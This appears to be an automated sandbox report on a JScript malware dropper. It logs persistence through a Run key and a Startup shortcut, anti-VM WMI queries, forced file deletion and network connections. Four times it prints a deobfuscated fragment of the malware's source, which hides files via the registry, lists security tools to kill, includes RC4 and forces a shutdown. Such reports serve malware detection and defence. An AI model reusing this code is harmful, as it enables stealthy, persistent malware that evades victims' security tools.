Source: unknownProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl
Source: unknownProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: unknownProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: unknownProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxjeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwlJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesylJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Binary string: scrrun.pdb source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source: Binary string: wshom.pdb source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeAnti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeAnti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: xPUqa4qbDLString : entropy: 5.81, length: 14783, content: ",{y$g*m%r=-5 ,e($t$R$1zO$7:G670v>5&70*>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliGo to definition
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnkJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run uobmovqnJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run uobmovqnJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Renames wscript.exe to bypass HIPSShow sources
Source: C:\Windows\System32\wscript.exeFile opened: C:\Windows\system32\wscript.exeJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6516Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9D4A0 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,7_2_00007FF7C0B9D4A0
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonnection-WFP Native MAC Layer LightWeight Filter-0000
Source: wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA0CC4 GetProcessHeap,RtlReAllocateHeap,memcpy,7_2_00007FF7C0BA0CC4
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA3CC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7C0BA3CC8

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: ibfmvoj.exe.2.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 204.11.56.48 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 72.52.178.23 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 199.59.242.153 80Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxjeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwlJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesylJump to behavior
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmpBinary or memory string: Progman
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: GetUserDefaultLangID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,7_2_00007FF7C0BA0EC4
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,_wcsncoll,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF7C0BA340C
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
